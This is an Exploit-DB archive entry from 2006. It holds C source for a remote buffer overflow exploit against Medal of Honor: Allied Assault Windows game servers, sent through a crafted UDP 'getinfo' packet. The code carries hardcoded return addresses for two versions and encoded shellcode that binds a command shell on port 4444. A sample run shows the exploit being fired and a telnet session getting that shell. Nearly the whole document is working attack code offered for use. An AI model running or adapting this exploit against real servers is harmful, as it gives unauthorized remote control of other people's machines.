Medal of Honor - 'getinfo' Remote Buffer Overflow

EDB-ID:

1776

CVE:

N/A




Platform:

Windows

Date:

2006-05-10


/*
MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
Written by RunningBon

Please use this responsibly, as I am not responsible for any damage you cause by using it.

IRC: irc.rizon.net #kik
E-mail: runningbon@gmail.com

Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)

Example:

C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
MoHAA Server Buffer overflow exploit
Written by RunningBon
E-Mail: runningbon@gmail.com
IRC: irc.rizon.net #kik

Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
Building packet.
Sending packet.
Packet sent.
Check for your shell on port 4444.

C:\>telnet 192.168.2.44 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\EA GAMES\MOHAA>
*/
#include <stdio.h>
#include <windows.h>

struct VersionStruct {
    char *pName;
    DWORD dwNewEIP;
    DWORD dwFillLength;
};

VersionStruct Versions[] = {
    "MOHAA-v1.11", 0xCBB935, 516,
    "MOHAA:S-v2.15", 0x923575, 516,
    //Add MOHAA:Breakthrough support
};

#pragma comment (lib, "ws2_32.lib")

//Port 4444 bindshell
unsigned char szShellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
"\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
"\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
"\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
"\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
"\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
"\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
"\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
"\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
"\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
"\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
"\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
"\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
"\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
"\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
"\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
"\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
"\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
"\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
"\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
"\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
"\x11\x13\x38\x7e\x92\xec\xee\x81";

void Error(char *pString)
{
    printf("[ERROR] %s\n", pString);
    ExitProcess(0);
}

int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
{
    WSAData WSADATA;
    SOCKET Socket = NULL;
    sockaddr_in SockAddr;
    char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
    char szBuffer[4096];
    int iLen = 0;

    WSAStartup(MAKEWORD(1, 1), &WSADATA);

    if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR)
    {
        Error("socket()");
        return 0;
    }

    SockAddr.sin_addr.s_addr = inet_addr(pIP);
    SockAddr.sin_port = htons(iPort);
    SockAddr.sin_family = AF_INET;

    printf("Building packet.\n");

    memset(szBuffer, 0, sizeof(szBuffer));

    memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
    iLen += sizeof(szHeader) - 1;

    memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
    iLen += pVersion->dwFillLength;

    memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
    iLen += sizeof(DWORD);

    memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
    iLen += sizeof(szShellcode);

    printf("Sending packet.\n");

    if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
    {
        Error("sendto()");
        return 0;
    }

    printf("Packet sent.\n");

    return 1;
}

void PrintWelcome()
{
    printf(
    "MoHAA Server Buffer overflow exploit\n"
    "Written by RunningBon\n"
    "E-Mail: runningbon@gmail.com\n"
    "IRC: irc.rizon.net #kik\n"
    "\n"
    );
}

void PrintUsage(char *pPath)
{
    printf("Usage: %s <IP> <Port> <Version Name>\n\n", pPath);

    printf("Supported Version List:\n");
    for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
    {
        printf("%s\n", Versions[i].pName);
    }
}

int main(int argc, char **argv)
{
    VersionStruct *pVersion = NULL;

    PrintWelcome();

    if(argc < 4)
    {
        PrintUsage(argv[0]);
        return 0;
    }

    for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
    {
        if(!stricmp(argv[3], Versions[i].pName))
        {
            pVersion = &Versions[i];
            break;
        }
    }

    if(pVersion == NULL)
    {
        Error("Invalid version.");
    }

    printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], atoi(argv[2]), pVersion->pName);

    if(Exploit(argv[1], atoi(argv[2]), pVersion))
    {
        printf("Check for your shell on port 4444.\n");
    }

    return 0;
}

// milw0rm.com [2006-05-10]